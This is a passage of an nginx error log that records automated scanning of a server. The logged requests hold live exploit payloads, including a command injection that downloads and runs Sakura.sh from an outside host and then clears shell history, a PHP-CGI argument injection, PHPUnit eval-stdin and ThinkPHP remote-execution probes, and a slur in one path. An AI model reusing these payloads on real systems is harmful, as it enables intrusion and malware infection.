*5898 open() "/var/www/html/HNAP1" failed (2: No such file or directory), client: 64.226.70.144, server: localhost-nginx-proxy-manager, request: "GET /HNAP1 HTTP/1.1", host: "222.117.41.51" -2026/02/15 04:00:26 [error] 520#520: *5901 open() "/var/www/html/cgi-bin/authLogin.cgi" failed (2: No such file or directory), client: 209.38.212.21, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/authLogin.cgi HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 04:00:26 [error] 520#520: *5902 open() "/var/www/html/query" failed (2: No such file or directory), client: 104.248.19.198, server: localhost-nginx-proxy-manager, request: "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 04:00:26 [error] 520#520: *5903 open() "/var/www/html/v2/_catalog" failed (2: No such file or directory), client: 209.38.212.21, server: localhost-nginx-proxy-manager, request: "GET /v2/_catalog HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 04:00:26 [error] 520#520: *5906 open() "/var/www/html/solr/admin/info/system" failed (2: No such file or directory), client: 46.101.143.239, server: localhost-nginx-proxy-manager, request: "GET /solr/admin/info/system HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 04:00:26 [error] 520#520: *5909 open() "/var/www/html/solr/admin/cores" failed (2: No such file or directory), client: 46.101.143.239, server: localhost-nginx-proxy-manager, request: "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 04:12:12 [error] 519#519: *7411 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 104.192.2.62, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "222.117.41.51" -2026/02/15 04:21:38 [error] 519#519: *7416 open() "/var/www/html/device.rsp" failed (2: No such file or directory), client: 47.121.210.129, server: localhost-nginx-proxy-manager, request: "GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=uname%20-a;cd+%2Ftmp+%7C%7C+cd+%2Fvar%2Frun+%7C%7C+cd+%2Fmnt+%7C%7C+cd+%2Froot+%7C%7C+cd+%2F%3B+wget+http%3A%2F%2F146.103.53.43%2FSakura.sh%3B+chmod+777+%2A%3B+sh+Sakura.sh%3B+rm+-rf+%2A.sh%3B+history+-c HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 04:47:43 [error] 519#519: *7553 open() "/var/www/html/SDK/duckyisafaggot" failed (2: No such file or directory), client: 195.178.110.241, server: localhost-nginx-proxy-manager, request: "GET /SDK/duckyisafaggot HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:31 [error] 520#520: *7666 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:32 [error] 520#520: *7666 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:32 [error] 520#520: *7666 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:32 [error] 520#520: *7666 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:33 [error] 520#520: *7666 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:33 [error] 520#520: *7666 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:33 [error] 520#520: *7666 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:34 [error] 520#520: *7666 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:34 [error] 520#520: *7666 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:34 [error] 520#520: *7666 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:35 [error] 520#520: *7666 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:35 [error] 520#520: *7666 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:35 [error] 520#520: *7666 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:36 [error] 520#520: *7666 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:36 [error] 520#520: *7666 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:36 [error] 520#520: *7666 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:37 [error] 520#520: *7666 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:37 [error] 520#520: *7666 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:37 [error] 520#520: *7666 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:38 [error] 520#520: *7666 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:38 [error] 520#520: *7666 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:38 [error] 520#520: *7666 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:39 [error] 520#520: *7666 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:39 [error] 520#520: *7666 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:39 [error] 520#520: *7666 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:40 [error] 520#520: *7666 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:40 [error] 520#520: *7666 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:40 [error] 520#520: *7666 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:41 [error] 520#520: *7666 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:41 [error] 520#520: *7666 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:42 [error] 520#520: *7666 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:42 [error] 520#520: *7666 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:42 [error] 520#520: *7666 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:43 [error] 520#520: *7666 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:43 [error] 520#520: *7666 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:43 [error] 520#520: *7666 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:44 [error] 520#520: *7666 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:44 [error] 520#520: *7666 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:44 [error] 520#520: *7666 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:45 [error] 520#520: *7666 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 05:43:46 [error] 520#520: *7666 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 82.165.66.87, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 06:37:11 [error] 576#576: *10961 open() "/var/www/html/security.txt" failed (2: No such file or directory), client: 199.45.155.90, server: localhost-nginx-proxy-manager, request: "GET /security.txt HTTP/1.1", host: "222.117.41.51" -2026/02/15 06:43:29 [error] 673#673: *11142 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 06:43:30 [error] 678#678: *11144 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 07:34:35 [error] 818#818: *11786 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.80.105.83, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "222.117.41.51" -2026/02/15 08:12:29 [error] 816#816: *12542 "/var/www/html/cgi-bin/luci/index.html" is not found (2: No such file or directory), client: 87.120.191.81, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/ HTTP/1.1", host: "222.117.41.51" -2026/02/15 10:39:21 [error] 819#819: *14815 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:22 [error] 819#819: *14815 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:22 [error] 819#819: *14815 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:22 [error] 819#819: *14815 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:22 [error] 819#819: *14815 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:22 [error] 819#819: *14815 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:22 [error] 819#819: *14815 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:23 [error] 819#819: *14815 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:23 [error] 819#819: *14815 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:23 [error] 819#819: *14815 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:23 [error] 819#819: *14815 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:23 [error] 819#819: *14815 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:23 [error] 819#819: *14815 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:23 [error] 819#819: *14815 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:24 [error] 819#819: *14815 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:24 [error] 819#819: *14815 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:24 [error] 819#819: *14815 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:24 [error] 819#819: *14815 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:24 [error] 819#819: *14815 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:24 [error] 819#819: *14815 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:24 [error] 819#819: *14815 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:25 [error] 819#819: *14815 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:25 [error] 819#819: *14815 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:25 [error] 819#819: *14815 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:25 [error] 819#819: *14815 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:25 [error] 819#819: *14815 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:25 [error] 819#819: *14815 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:26 [error] 819#819: *14815 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:26 [error] 819#819: *14815 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:26 [error] 819#819: *14815 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:26 [error] 819#819: *14815 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:26 [error] 819#819: *14815 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:26 [error] 819#819: *14815 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:26 [error] 819#819: *14815 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:27 [error] 819#819: *14815 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:27 [error] 819#819: *14815 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:27 [error] 819#819: *14815 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/15 10:39:27 [error] 819#819: *14815 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET 